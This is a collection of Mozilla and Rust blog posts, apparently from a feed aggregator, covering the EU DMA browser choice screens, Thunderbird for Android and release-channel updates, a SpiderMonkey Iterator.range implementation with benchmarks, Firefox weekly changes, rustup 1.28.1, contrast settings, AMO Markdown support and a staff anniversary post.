The Mozilla Blog: Browser choice? Here’s how EU’s DMA is helping make it real

Too often, well-intentioned regulation misses the mark. This can be due to poor design, poor implementation, poor compliance, or failure to address unintended consequences. But the EU’s Digital Markets Act (DMA) has the potential to be different.

The DMA is a regulatory framework that came into effect in the EU in March 2024. It covers a range of services, including browsers, where it empowers people in the EU to choose a browser for themselves. 

Twelve months later, the verdict’s in, and it proves what 98% of people told us before the DMA even kicked in last year: People want browser choice. And when they are given real choice, they will opt for a browser that serves their needs and preferences. 

For many EU consumers, this choice has been Firefox — an independent browser that offers the features they want in terms of privacy, safety, productivity and speed.

Why is the DMA important?

The DMA is a first-of-its-kind regulation. Its aim? Leveling the playing field so that EU consumers can discover and use products from smaller, innovative companies without being blocked by gatekeeper operating systems. In practice? When it comes to browsers, it means putting real choice in the hands of users. The desired outcome? Removing barriers to choice such as the complex device settings consumers have to navigate to change their pre-installed browser — and enabling them to keep their choice. 

Under the DMA, certain operating system providers are required to prompt users to actively select their preferred default web browser through a choice screen.

What is a browser choice screen and when will I see one?

Browser choice screens are a seemingly simple solution — a menu of options listed for you to choose your preferred default browser. 

The first DMA browser choice screens started rolling out in the EU in March 2024. Since then, they have slowly started appearing for:

  • New and existing Android smartphones and tablet users with Chrome pre-set as a default browser (though rollout has been fairly inconsistent)
  • New and existing iOS users with Safari as their default browser, who have iOS 18.2 and iPadOS 18.2 or later iOS versions installed on their device (initial roll out in iOS 17.4 was poorly designed)

Unfortunately, if you’re a smartphone user outside the EU — or a Windows/Mac user anywhere — you won’t have seen the benefit of browser choice screens. Yet.  

Why does browser choice matter?

From our research, we know that when well-designed and fully implemented, browser choice screens can be a powerful tool. They can not only provide people with real choice but can also have a huge impact on their levels of satisfaction with their tech by giving them freedom to customize their device experience more easily and quickly. Just as important, browser choice screens can promote user choice without degrading the user experience or causing unintended harm to consumers, competition and innovation.

Browser choice screens also matter because they allow people to opt for independent alternatives like Firefox that are not tied to an operating system or device manufacturer. This makes them a critical intervention against the self-preferencing deployed by device manufacturers and operating systems, which push people to use their own-label browsers and services.

What happens when you choose for yourself?

Despite vague compliance plans and some obvious gatekeeper non-compliance preventing the DMA from reaching its full potential, one year on we’re starting to see how targeted regulation can help tackle some of the barriers to competition in the browser space, and what can happen when the power of browser choice is in the hands of consumers.

Since the launch of the first DMA browser choice screens on iOS in March 2024, people are making themselves heard: Firefox daily active users in Germany alone have increased by 99%. And in France, Firefox’s daily active users on iOS grew by 111%. 

This growth has also been fueled by a number of new features coming to Firefox — from enhanced privacy controls and performance updates to new productivity tools — but the effect of the DMA is clear. When people are given browser choice, they vote with their feet for a product they love and stick with it. 

And we’ve found that when people choose Firefox via a DMA choice screen, they stick with it. 

Why choose Firefox?

When Firefox launched 20 years ago, our mission was to provide people with an alternative: a browser that prioritizes user privacy, transparency and openness.

The internet has changed dramatically since then, but our mission to keep the internet open and accessible to everyone is more important than ever. This is why we’re continuously improving Firefox and working on providing users with real choice, giving them control of their internet experience through privacy and productivity enhancing features. 

Not convinced yet? Don’t take our word for it; check out what users say they love about Firefox.

Ready to make the switch? Don’t wait for a choice screen: download Firefox or set it as your default browser now.



Mozilla Thunderbird: Thunderbird for Android January/February 2025 Progress Report

Hello, everyone, and welcome to the first Android Progress Report of 2025. We’re ready to hit the ground running improving the Thunderbird for Android experience for all of our users. Our January/February update covers improvements to the account drawer and folders on our roadmap, an update on Google and K-9 Mail, and our first steps toward Thunderbird on iOS.

Account Drawer Improvements

As we noted in our last post on the blog, improving the account drawer experience is one of our top priorities for development in 2025. We heard your feedback and want to make sure we provide an account drawer that lets you navigate between accounts easily and efficiently. Let’s briefly go into the most common feedback:

  • Accounts on the same domain or with similar names are difficult to tell apart from just the two letters provided.
  • It isn’t clear how the account name influences the initials.
  • The icons seemed to be jumping around, especially obvious with 3–5 accounts.
  • There is a lot of spacing in the new drawer.
  • Users would like more customization options, such as an account picture or icon.
  • Some users would like to see a broader view that shows the whole account name.
  • With just one account, the accounts sidebar isn’t very useful.

Our design folks are working on mockups of where the journey is taking us. We’re going to share them on the beta topicbox where you can provide more targeted feedback, but for a sneak peek, here is a medium-fidelity mockup of what the new drawer and settings could look like:

On the technical side, we’ve integrated an image loader for the upcoming account pictures. We now need to gradually implement the mockups, beginning with the settings screen changes and then adapting the drawer itself.

Notifications and Error States

Some of you had the feeling your email was not arriving quickly enough. While email delivery is reliable, there are a few settings in Thunderbird for Android and K-9 Mail that aren’t obvious, which leads to confusion. When permissions are not granted, functionality is simply turned off instead of telling the user they need to grant the alarms permission for us to do a regular sync. Or maybe the sync interval is simply set to the default of one hour.

We’re still in the process of mapping out the best experience here, but will have more updates soon. See the notifications support article in case you are experiencing issues. A few things we’re aiming for this year:

  • Show an indicator in foreground service notification when push isn’t working for all configured folders
  • Show more detailed information when foreground service notification is tapped
  • Move most error messages from the system notifications to an area in-app to clearly identify when there is an error
  • Make authentication errors, certificate errors, and persistent connectivity issues use the new in-app mechanism
  • Make the folder synchronization settings more clear (ever wondered why there is “sync” and “push” and if you should have both enabled or not?)
  • Prompt for permissions when they are needed, such as aforementioned alarms permission
  • Indicate to the user if permissions are missing for their folder settings.
  • Better debug tool in case of notification issues.

Road(map) to the Highway

Our roadmap is currently under review from the Thunderbird council. Once we have their final approval, we’ll update the roadmap documentation. While we’re waiting, we would like to share some of the items we’ve proposed:

  • Listening to community feedback on Mozilla Connect and implementing HTML signatures and quick filter actions, similar to the Thunderbird Desktop
  • Backend refactoring work on the messages database to improve synchronization
  • Improving the message display so that you’ll see fewer prompts to download additional messages
  • Adding Android 15 compatibility, which is mainly edge-to-edge support
  • Improving the QR code import defaults (relates to notification settings as well)
  • Making better product decisions by (re-)introducing a limited amount of opt-in telemetry.

Does that sound exciting to you? Would you like to be a part of this but don’t feel you have the time? Are you good at writing Android apps in Kotlin and have an interest in multi-platform work? Well, do I have a treat for you! We’re hiring an Android Senior Software Engineer to work on Thunderbird for Android!

K-9 Mail Blocked from Gmail

We briefly touched on this in the last update as well: some of our users on K-9 Mail have noticed issues with an “App Blocked” error when trying to log into certain Gmail accounts. Google is asking K-9 Mail to go through a new verification process and has introduced some additional requirements that were not needed before. Users that are already logged in or have logged in recently should not be affected currently.

Meeting these requirements depended on several factors beyond our control, so we weren’t able to resolve this immediately.

If you are experiencing this issue on K-9 Mail, the quickest workaround is to migrate to Thunderbird for Android, which uses application keys that have so far not been blocked, or check out one of the other options on the support page. Our account import feature will make this transition pretty seamless. For those interested, more technical details can be found in issue 8598.

We’ve been able to make some major progress on this: we have a vendor for the required CASA review and expect the letter of validation to be shared soon. We’re still hitting a wall with Google, as they are giving us inconsistent information on the state of the review and imposing some requirements on the privacy policy that sound more like they are intended for web apps. We’ve made an effort to clarify this further and hope that Google will accept our revised policy.

If all goes well we’ll get approval by the end of the month, and then need to make some changes to the key distribution so that Thunderbird and K-9 use the intended keys. 

Our Plans for Thunderbird on iOS

If you watched the Thunderbird Community Office Hours for January, you might have noticed us talking about iOS. You heard right – our plans for the Thunderbird iOS app are getting underway! We’ve been working on some basic architectural decisions and plan to publish a barebones repository on GitHub soon. You can expect a readme and some basic tools, but the real work will begin when we’ve hired a Senior Software Engineer who will lead development of a Thunderbird app for the iPhone and iPad. Interviews for some candidates have started and we wish them all the best!

With this upcoming hire, we plan to have alpha code available on TestFlight by the end of the year. To set expectations up front, functionality will be quite basic. A lot of work goes into writing an email application from scratch. We’re going to focus on a basic display of email messages, and then expand to triage actions. Sending basic emails is also on our list.

FOSDEM

Our team recently attended FOSDEM in Brussels, Belgium. For those unfamiliar with FOSDEM, it’s the Free and Open Source Software Developers’ European Meeting—an event where many open-source enthusiasts come together to connect, share knowledge and ideas, and showcase the projects they’re passionate about.

We received a lot of valuable feedback from the community on Thunderbird for Android. Some key areas of feedback included the need for Exchange support, improvements to the folder drawer, performance enhancements, push notifications (and some confusion around their functionality), and much more.

Our team was highly engaged in listening to this feedback, and we will take all of it into account as we plan our future roadmap. Thunderbird has always been a project developed in tandem with our community and it was exciting for us to be at FOSDEM to connect with our users, contributors and friends.

In other news…

As always, you can join our Android-related mailing lists on TopicBox. And if you want to help us test new features, you can become a beta tester.

This blog post talks a lot about the exciting things we have planned for 2025. We’re also hiring for two positions, and may have a third one later in the year. While our software is free and open source, creating a world-class email application isn’t without a cost. If you haven’t already made a contribution in January, please consider supporting our work with a financial contribution. Thunderbird for Android relies entirely on user funding, so without your support we could likely only get to a fraction of what you see here. Making a contribution is really easy if you have Thunderbird for Android or K-9 Mail installed: just head over to the settings and sign up directly from your device.

See you next month,


SpiderMonkey Development Blog: Implementing Iterator.range in SpiderMonkey

In October 2024, I joined Outreachy as an Open Source contributor and in December 2024, I joined Outreachy as an intern working with Mozilla. My role was to implement the TC39 Range Proposal in the SpiderMonkey JavaScript engine. Iterator.range is a new built-in method proposed for JavaScript iterators that allows generating a sequence of numbers within a specified range. It functions similarly to Python’s range, providing an easy and efficient way to iterate over a series of values:

for (const i of Iterator.range(0, 43)) console.log(i); // 0 to 42

But also things like:

function* even() {
  for (const i of Iterator.range(0, Infinity)) if (i % 2 === 0) yield i;
}
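The proposal also accepts an optional step as a third argument and works over BigInt values, both of which show up in the benchmarks later in this post. A small illustration, assuming the semantics of the current proposal draft:

// Optional step argument and BigInt ranges, as exercised in the benchmarks below.
for (const i of Iterator.range(0, 10, 2)) console.log(i);    // 0, 2, 4, 6, 8
for (const i of Iterator.range(1n, 10n, 3n)) console.log(i); // 1n, 4n, 7n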

In this blog post, we will explore the implementation of Iterator.range in the SpiderMonkey JavaScript engine.

Understanding the Implementation

When I started working on Iterator.range, the initial implementation had been done, i.e., adding a preference for the proposal and making the builtin accessible in the JavaScript shell.

Iterator.range simply returned false, a stub indicating that the actual implementation of Iterator.range was under development or not fully implemented, which is where I came in. As a start, I created a CreateNumericRangeIterator function that delegates to the Iterator.range function. Following that, I implemented the first three steps within the Iterator.range function. Next, I initialised variables and parameters for the NUMBER-RANGE data type in the CreateNumericRangeIterator function.

I focused on implementing sequences that increase by one, such as Iterator.range(0, 10). Next, I created an IteratorRangeGenerator* function (i.e., step 18 of the Range proposal) that, when called, doesn’t execute immediately but returns a generator object which follows the iterator protocol. Inside the generator function there are yield statements which represent where the function suspends its execution and provides a value back to the caller. Additionally, I updated the CreateNumericRangeIterator function to invoke IteratorRangeGenerator* with the appropriate arguments, aligning with step 19 of the specification, and added tests to verify its functionality.

The generator will pause at each yield, and will not continue until the next method is called on the generator object that is created. The NumericRangeIteratorPrototype (step 27.1.4.2 of the proposal) is the object that holds the iterator prototype for the numeric range iterator. The next() method is added to the NumericRangeIteratorPrototype; when you call next() on an object created from NumericRangeIteratorPrototype, it doesn’t directly return a value, but makes the generator yield the next value in the series, effectively resuming the suspended generator.

The first time you invoke next() on the generator object created via IteratorRangeGenerator*, the generator will run up to the first yield statement and return the first value. When you invoke next() again, the NumericRangeIteratorNext() will be called.

This method uses GeneratorResume(this), which means the generator will pick up right where it left off, continuing to the next yield statement or until iteration ends.
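To make the shape of this approach concrete, here is a rough plain-JavaScript approximation of the generator-based design described above. It is a sketch for illustration only, not the actual self-hosted SpiderMonkey code, and the bounds handling is simplified:

// Rough approximation of the generator-based design (illustrative sketch,
// not the actual self-hosted code).
function* iteratorRangeGenerator(start, end, step) {
  let count = 0;
  while (true) {
    const value = start + step * count;
    // Simplified bound check; the proposal spells this out per sign of step.
    if (step > 0 ? value >= end : value <= end) {
      return;
    }
    yield value; // Execution suspends here until next() is called again.
    count++;
  }
}

// The returned generator object follows the iterator protocol:
const gen = iteratorRangeGenerator(0, 3, 1);
console.log(gen.next()); // { value: 0, done: false }
console.log(gen.next()); // { value: 1, done: false }
console.log([...iteratorRangeGenerator(0, 3, 1)]); // [0, 1, 2]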

Generator Alternative

After discussions with my mentors Daniel and Arai, I transitioned from a generator-based implementation to a more efficient slot-based approach. This change involved defining slots to store the state necessary for computing the next value. The reasons included:

  • Efficiency: Directly managing iteration state is faster than relying on generator functions.
  • Simplified Implementation: A slot-based approach eliminates the need for generator-specific handling, making the code more maintainable.
  • Better Alignment with Other Iterators: Existing built-in iterators such as StringIteratorPrototype and ArrayIteratorPrototype do not use generators in their implementations.
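For comparison, here is a simplified sketch, again in plain JavaScript, of the slot-based idea: the iterator object keeps its state directly and next() computes each value from that state without any generator machinery. In the real implementation this state lives in reserved slots on the iterator object and next() is implemented in self-hosted code; the sketch below only illustrates the concept:

// Conceptual sketch of a slot-based range iterator (illustration only).
function createNumericRangeIterator(start, end, step) {
  return {
    // State the real iterator keeps in reserved slots.
    start, end, step, count: 0,
    next() {
      const value = this.start + this.step * this.count;
      const exhausted = this.step > 0 ? value >= this.end : value <= this.end;
      if (exhausted) {
        return { value: undefined, done: true };
      }
      this.count++;
      return { value, done: false };
    },
    [Symbol.iterator]() { return this; },
  };
}

for (const n of createNumericRangeIterator(0, 5, 1)) {
  console.log(n); // 0, 1, 2, 3, 4
}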

Performance and Benchmarks

To quantify the performance improvements gained by transitioning from a generator-based implementation to a slot-based approach, I conducted comparative benchmarks using a test against the current mozilla-central and against the revision that used the generator-based approach. My benchmark tested two key scenarios:

  • Floating-point range iteration: Iterating through 100,000 numbers with a step of 0.1
  • BigInt range iteration: Iterating through 1,000,000 BigInts with a step of 2

Each test was run 100 times to eliminate anomalies. The benchmark code was structured as follows:

// Benchmark for Number iteration
var sum = 0;
for (var i = 0; i < 100; ++i) {
  for (const num of Iterator.range(0, 100000, 0.1)) {
    sum += num;
  }
}
print(sum);

// Benchmark for BigInt iteration
var sum = 0n;
for (var i = 0; i < 100; ++i) {
  for (const num of Iterator.range(0n, 1000000n, 2n)) {
    sum += num;
  }
}
print(sum);

Results

| Implementation  | Execution Time (ms) | Improvement |
|-----------------|---------------------|-------------|
| Generator-based | 8,174.60            | -           |
| Slot-based      | 2,725.33            | 66.70%      |

The slot-based implementation completed the benchmark in just 2.7 seconds compared to 8.2 seconds for the generator-based approach. This represents a 66.7% reduction in execution time, or in other words, the optimized implementation is approximately 3 times faster.

Challenges

Implementing BigInt support was straightforward from a specification perspective, but I encountered two blockers:

1. Handling Infinity Checks Correctly

The specification ensures that start is either a Number or a BigInt in steps 3.a and 4.a. However, step 5 states:

  • If start is +∞ or -∞, throw a RangeError.

Despite following this, my implementation still threw an error stating that start must be finite. After investigating, I found that the issue stemmed from using a self-hosted isFinite function.

The specification requires isFinite to throw a TypeError for BigInt, but the self-hosted Number_isFinite returns false instead. This turned out to be more of an implementation issue than a specification issue.

See the GitHub discussion here.

  • Fix: Explicitly check that start is a number before calling isFinite:
// Step 5: If start is +∞ or -∞, throw a RangeError.
if (typeof start === "number" && !Number_isFinite(start)) {
  ThrowRangeError(JSMSG_ITERATOR_RANGE_START_INFINITY);
}

2. Floating Point Precision Errors

When testing floating-point sequences, I encountered an issue where some decimal values were not represented exactly due to JavaScript’s floating-point precision limitations. This caused incorrect test results.

There’s a GitHub issue discussing this in depth. I implemented an approximatelyEqual function to compare values within a small margin of error.

  • Fix: Using approximatelyEqual in tests:
const resultFloat2 = Array.from(Iterator.range(0, 1, 0.2));
approximatelyEqual(resultFloat2, [0, 0.2, 0.4, 0.6, 0.8]);

This function ensures that minor precision errors do not cause test failures, improving floating-point range calculations.
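The post does not include the helper itself; a minimal sketch of what such an approximatelyEqual helper could look like is below (the tolerance value is an assumption, not necessarily what the actual test suite uses):

// Minimal sketch of an approximate-equality helper for floating-point tests.
// The epsilon value is an assumption, not the one used in the real tests.
function approximatelyEqual(actual, expected, epsilon = 1e-10) {
  if (actual.length !== expected.length) {
    throw new Error(`length mismatch: ${actual.length} !== ${expected.length}`);
  }
  for (let i = 0; i < actual.length; i++) {
    if (Math.abs(actual[i] - expected[i]) > epsilon) {
      throw new Error(`element ${i}: ${actual[i]} not within ${epsilon} of ${expected[i]}`);
    }
  }
}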

Next Steps and Future Improvements

There are different stages a TC39 proposal goes through before it can be shipped. This document shows the different stages that a proposal goes through from ideation to consumption. The Iterator.range proposal is currently at Stage 1, the draft stage. Ideally, the proposal should advance to Stage 3, which means that the specification is stable and no changes to the proposal are expected, though some necessary changes may still occur due to web incompatibilities or feedback from production-grade implementations.

Currently, this implementation is in its early stages. It’s only built in Nightly and disabled by default until the proposal reaches Stage 3 or 4 and no further revisions to the specification are expected.

Final Thoughts

Working on the Iterator.range implementation in SpiderMonkey has been a deeply rewarding experience. I learned how to navigate a large and complex codebase, collaborate with experienced engineers, and translate a formal specification into an optimized, real-world implementation. The transition from a generator-based approach to a slot-based one was a significant learning moment, reinforcing the importance of efficiency in JavaScript engine internals.

Beyond technical skills, I gained a deeper appreciation for the standardization process in JavaScript. The experience highlighted how proposals evolve through real-world feedback, and how early-stage implementations help shape their final form.

As Iterator.range continues its journey through the TC39 proposal stages, I look forward to seeing its adoption in JavaScript engines and the impact it will have on developers. I hope this post provides useful insights into SpiderMonkey development and encourages others to contribute to open-source projects and JavaScript standardization efforts.

If you’d like to read more, here are my blog posts that I made during the project:

Firefox Nightly: High Profile Improvements – These Weeks in Firefox: Issue 176

Highlights

  • Multiple profiles are now enabled by default in Nightly!
  • For WebExtension authors, failed downloads with a NETWORK_FAILED error can now be resumed through the downloads WebExtensions API – Bug 1694049
    • Thanks to kernp25 for contributing a fix for this longstanding bug 🎉
  • Alexandre Poirot has enabled Service Worker debugging by default in the Firefox DevTools debugger
  • Moritz fixed a bug where users switching between Fx versions using the same profile were unable to search and saw broken context menus. This affected a small number of users in release, and so his patch landed in a dot release.

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • kernp25

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Tabs that have been redirected to a moz-extension URL (e.g. through webRequest or DNR) can now be reloaded or navigated back to successfully via the tab history – Bug 1826867
WebExtension APIs
  • Starting from Firefox 136, the menus.update and menus.remove API methods will return a rejected promise instead of ignoring non-existing menus – Bug 1688743
  • Fixed bug in DNR `initiatorDomains` and `requestDomains` conditions – Bug 1939981
    • Thanks to Arkadiy Tetelman for reporting and contributing a fix for this bug 🎉

DevTools

  • Alexandre Poirot worked on several fixes for webextensions debugging:
    • Fixed a regression where webextensions creating iframes would lead to blank devtools (#1941006)
    • Fixed a bug where content scripts could appear duplicated in the source tree, and would also result in awkward behavior when pausing / stepping (#1941681)
    • Improved the handling of messages logged from content scripts to avoid duplicated log entries (#1941418)
    • Show manifest error when reloading an addon from DevTools (#1940079)
      • An error message appearing in the debugger for a WebExtension when the manifest cannot be loaded. The error reads: "Unable to reload: JSON.parse: expected double-quoted property name at line 3 column 3 of the JSON data from: server0.conn1.webExtensionDescriptor13 (resource://gre/modules/Extension.sys.mjs: 1176:26)"

        An error message is certainly better than silently failing in this case.

  • Nicolas Chevobbe fixed a few accessibility and High Contrast mode issues:
    • Fixed the color of the close button used in sourcemap warnings to be correct in dark mode (#1942227)
    • Updated the netmonitor status codes to be visible in High Contrast mode (#1940749)
  • Nicolas Chevobbe also made several improvements to autocompletes in DevTools:
    • The CSS autocomplete will now provide suggestions for variables when used inside calc, for instance in width: calc(var(-- (#1444772)
    • The autocomplete in the inspector search is now handling correctly classnames containing numbers and special characters (#1220387)
  • Nicolas Chevobbe addressed a long standing issue in the JSON viewer which would always display values after parsing them via JS, which could result in approximate values for big numbers or high precision decimals. The source is now always displayed, and we also show the JS parsed value next to it when relevant. (#1431808)
    • The JSON Viewer developer tool showing two very large numeric values. They are shown exactly as they're defined in the JSON, and then right next to them is an indicator displaying the numeric value that they were parsed to.
  • Julian Descottes fixed a bug with the Debugger local script override which might incorrectly show scripts as being overridden if another DevTools Toolbox previously added an override (#1940998)
  • Julian Descottes addressed a regression which would lead to blank devtools if any iframe on the page was showing an XML document with an invalid XSLT (#1934520)
  • Julian Descottes fixed an issue with the Debugger pretty printing feature, which could fail if the file contained windows-style line-breaks (#1932023)
  • Julian Descottes finalized an old patch to show details about the throttling profiles you can select in the network monitor and RDM (#1770932)
    • The throttling menu for the Network Monitor developer tools is displayed, with each menu item indicating the approximate download and upload speed, as well as an indication of latency. For example: "GPRS (↓50Kbps ↑20Kbps ⏲ 500ms)"

      In case you need a reminder of what 2G speed is like.

  • Hubert Boma Manilla fixed a recent regression with the preview popup in the debugger which would not show the value of the hovered token (#1941269)
  • Hubert Boma Manilla improved the edit and resend feature in the netmonitor to properly set the security flags for the resent requests and avoid bugs for instance with requests using CORS (#1883380)

WebDriver BiDi

Lint, Docs and Workflow

  • Gijs enabled the eslint-plugin-promise rule for valid-params which checks that functions on Promise are called with the correct number of arguments.
    • This will protect against cases such as foo.catch() which looks like it should do something, but doesn’t.
  • Standard8 added a linter for checking that we don’t include package names in unpublished package.json files.

New Tab Page

  • The New Tab layout update has rolled out to 100% of our US population! We’re aiming to do the rest of the world soon.

Search and Navigation

  • Address Bar
    • Mandy fixed a bug so that we now correctly handle a question mark appearing at the end of a search string (1648956)
    • James landed a patch related to urlbar interaction tracking that ends all interactions after one hour of inactivity (1936956)
    • Emilio fixed a bug where, when Firefox Translations was used for a page, the address bar wasn’t showing what language the page had been translated to (1938121)
    • Marco fixed a bug where the search open tabs feature wasn’t finding tabs where the page had loaded with a 4xx or 5xx server status error (1939597)
  • Scotch Bonnet
    • Yazan fixed an issue where search mode was defaulting to Google after the browser was restarted (1925235)
    • Daisuke fixed an issue where screenreaders were failing to narrate secondary actions buttons when in actions mode (1929515)
    • Daisuke also fixed an issue related to using ctrl+shift+tab to navigate to the previous tab (1933243)
    • Daisuke fixed an issue where the unified search button dropdown wasn’t being dismissed when a new tab was opened using ctrl+T (1936545)
    • Marco enabled the not secure label for http for Release 136 (1937136)
    • Dale fixed an issue so that the search keyword is retained for contextual search mode when the engine is autofilled (1938036)
    • Daisuke landed a patch so that contextual search works with multiple-word searches (1938040)
    • Moritz fixed a bug where the unified search button icon wasn’t being refreshed correctly in private browsing windows (1938567)

Storybook/Reusable Components

  • Hanna created the moz-input-text component Storybook
  • Tim created the moz-input-search component (more changes to come) Storybook
  • Anna added documentation for moz-button Storybook
  • Jules added support for description and support-page to the moz-radio-group (for the group itself, it was already there for individual radios) Storybook

  • Hanna added the moz-box-button component that will be used in the Settings redesign and some other settings throughout Firefox Storybook

Mozilla Thunderbird: Thunderbird Release Channel Update

The monthly Release channel is ready to help you move from annual to monthly updates in Thunderbird. This update lets you know how to switch from the annual update (ESR) to monthly updates (Release), why you might have to wait, and what features you’ll get first!

How do I switch from annual to monthly updates (ESR to Release)?

Right now, you can switch to the Release channel only through a manual install from the Thunderbird website Downloads page. Other installation sources, such as the Windows Store, third-party sites, and Linux packages like Snap and Flatpak, will offer the Release version in the future.

First, back up your profile data, as you should always do before making major changes, and check that your computer meets the System Requirements for version 136. Then go to the Downloads page of the website. If the Release Channel selector does not show “Thunderbird Release”, correct it, then click the ‘Download’ button. For Windows and macOS, run the downloaded file to install the monthly release into the same directory where the ESR is currently installed. (If you have installed Thunderbird ESR into a directory that is different from the default location, then you must do a custom installation to that directory.) For Linux, consult the Linux installation knowledge base (KB) article.

What’s new in 136.0?

Now that you know how to make the switch, here are some reasons to make the change. These are some of the key features you’ll get as soon as you upgrade to the Release channel:

Improved Dark Reader

Enable dark reader for the message pane with `mail.dark-reader.enabled` preference

Improved Dark Mode

Messages are automatically adapted to dark mode with a quick toggle in the header

A Global Switch for Threading

New “Appearance” Settings UI to globally control message threading/sorting order

Filters in the Folder Pane

Message filters are now available in the Folder Pane context menu

Horizontal Threadpane Scrolling

Enable horizontal threadpane scrolling with `mail.threadpane.table.horizontal_scroll` preference

Improved Calendar Setup Wizard

Added checkbox to select/unselect all calendars in the calendar setup wizard

See all the changes in our Release Notes.


The Rust Programming Language Blog: Announcing rustup 1.28.1

The rustup team is happy to announce the release of rustup version 1.28.1. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

Challenges with rustup 1.28.0

rustup 1.28.0 was a significant release with many changes, and there was a quick response from many folks that this release broke their processes. While we considered yanking the release, we worried that this would cause problems for people who had already updated to adopt some of the changes. Instead, we are rolling forward with 1.28.1 today and potentially further bugfix releases to address the feedback that comes in.

We value all constructive feedback -- please keep it coming in the issue tracker. In particular, the change with regard to implicit toolchain installation is being discussed in this issue.

What's new in rustup 1.28.1

This release contains the following fixes:

How to update

If you have a previous version of rustup installed, getting rustup 1.28.1 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

$ rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

$ rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

Rustup's documentation is also available in the rustup book.

Caveats

Rustup releases can come with problems not caused by rustup itself but just due to having a new release. As such, we recommend paying attention to the following potential issues in particular:

These issues should be automatically resolved in a few weeks when the anti-malware scanners are updated to be aware of the new rustup release, and the hosted version is updated across all CI runners.

Thanks

Thanks to the rustup and t-release team members who came together to quickly address these issues.

Eitan Isaacson: New Contrast Control Settings

What We Did

In today’s nightly build of Firefox we introduced a simple three-state toggle for color contrast.

Screenshot of radio group in Firefox settings

It allows you to choose between these options:

  • Automatic (use system settings): Honor the system’s high contrast preferences in web content. If this is enabled, and say you are using a Windows High Contrast theme, the web content’s style will be overridden wherever needed to display text and links with the system’s colors.
  • Off: Regardless of the system’s settings, the web content should be rendered as the content author intended. Colors will not be forced.
  • Custom: Always force user-specified colors in web content. Colors for text and link foregrounds and backgrounds can be specified in the preferences UI.

Who Would Use This and How Would They Benefit?

There are many users with varying degrees of vision impairment who benefit from having control over the colors and the intensity of the contrast between text and its background. We pride ourselves on Firefox offering fine-grained control to those who need it. We also try to do a good job anticipating the edge cases where forced high contrast might interfere with a user’s experience; for example, we put a solid background backplate under text that is superimposed on top of an image.

But, the web is big and complex and there will always be cases where forced colors will not work. For example, take this Wordle puzzle:

Wordle with default colors

The gold tiles indicate letters that are in the hidden word, and the green tiles represent letters that are in the word and in the right place in the word.

When a user is in forced colors mode, the background of the tiles disappears and the puzzle becomes unsolvable:

Wordle in forced colors mode

What More Can We Expect?

The work we did to add contrast control to the settings is a first step in allowing a user to quickly configure their web browser experience in order to adapt to their current uses. Just like text zoom, there is no one-size-fits-all. We will be working to allow users to easily adjust their color contrast settings as they are browsing and using the web.

Mozilla Add-ons Blog: Styling your listing page on AMO with Markdown

The Mozilla Add-ons team is excited to announce that developers can now style content on addons.mozilla.org (AMO) using Markdown.

From the early days of AMO, developers have been able to style parts of their add-ons’ listings using basic HTML tags like <b>, <code>, and <abbr>. This has been a great way for developers to emphasize information or add character to their listings. This feature has, unfortunately, also been a common source of mistakes. It’s not unusual to see stray HTML tags displayed in listings due to missing closing tags, typos, or developers trying to use unsupported HTML elements.

To address this common source of errors and to better align with other tools that developers use, Mozilla has replaced AMO’s limited HTML support with a limited set of Markdown.

Our flavor of Markdown

AMO supports about a dozen Markdown rules: bold, italic, monospace, links, abbreviations, code blocks, blockquotes, ordered lists, and unordered lists. HTML is not supported. The full list of supported syntax and examples can be found in our documentation.

Currently, Markdown can be used in four areas: an add-on’s description, a custom license, custom privacy policy, and in review replies posted by the developer.

As before, links are automatically replaced by a version that is routed through AMO’s link bouncer.

How this change affects HTML content

AMO’s Markdown does not support HTML content. As a result, any HTML entered in a field that supports Markdown will display as plain text.

This change is not retroactive. Any content authored while HTML was supported will continue to display as originally intended. Only content updated after Markdown support was added will be treated as Markdown.


Jan-Erik Rediger: Seven-year Moziversary

In March 2018 I started a job as a Telemetry engineer at Mozilla. Seven years later I'm still here on my Moziversary, as I was in 2019, 2020, 2021, 2022, 2023 and 2024.

Mozilla is not the same company it was when I joined. No one on the C-level is here for as long as I am. There have been 5 larger reorgs in the past year and two layoffs in different departments, plus the big round of layoffs at the Mozilla Foundation. My part of the organization was moved around again and for the moment Data Engineering is nested under the Infrastructure Org. Good colleagues left or were laid off. Just recently my team shrunk again. Notably I haven't posted anything under the mozilla tag since 2022, other than my Moziversary blog posts.

All-Hands MozWeek[1] Dublin happened. The next one will be in Washington, D.C. Probably one of the worst choices given the state of the USA right now, and I might just skip it. I do hope for a team work week, but that’s not decided yet.

The one constant over the past years is my work on Glean, which hasn’t stopped. We’re finally putting dedicated effort into moving legacy telemetry in Firefox Desktop over to Glean (Are we Glean yet?). But still Glean isn’t where I’d like it to be. Some of the early decisions in its design are coming back to bite us, the codebase grew significantly and could use a bit of cleanup, we never got the time to work on performance and memory improvements, and our chosen local data storage desperately needs an update. Some of that was on my list last year already. If only there were fewer distractions that pull me off this work again and again. It’s on my list of goals again this year, so maybe it works out better this time.

But other than that I don't know where Mozilla will be a year from now. It's going to be a challenging year.

Thank you

I'm in this job for seven years not only because I like the tech I get to work on, but also because my colleagues make it a delight to come back to work every day. Thanks to Alessio, Chris, Travis and Abhishek for being the Data Collection Tools team. Also thanks to Bruno, who was part of the team until recently. There's countless other people at Mozilla, inside Data Engineering but also across other parts of the organization, that I got to connect, chat and work with. Thank you!


Footnotes:

[1] Change everywhere. Those Mozilla work weeks were renamed by Marketing.

The Rust Programming Language Blog: February Project Goals Update

This is the first Project Goals update for the new 2025h1 period. For the first 6 months of 2025, the Rust project will work towards a slate of 39 project goals, with 3 of them designed as Flagship Goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

Why this goal? This work continues our drive to improve support for async programming in Rust. In 2024H2 we stabilized async closures; explored the generator design space; and began work on the dynosaur crate, an experimental proc-macro to provide dynamic dispatch for async functions in traits. In 2025H1 our plan is to deliver (1) improved support for async-fn-in-traits, completely subsuming the functionality of the async-trait crate; (2) progress towards sync and async generators, simplifying the creation of iterators and async data streams; (3) and improve the ergonomics of Pin, making lower-level async coding more approachable. These items together start to unblock the creation of the next generation of async libraries in the wider ecosystem, as progress there has been blocked on a stable solution for async traits and streams.

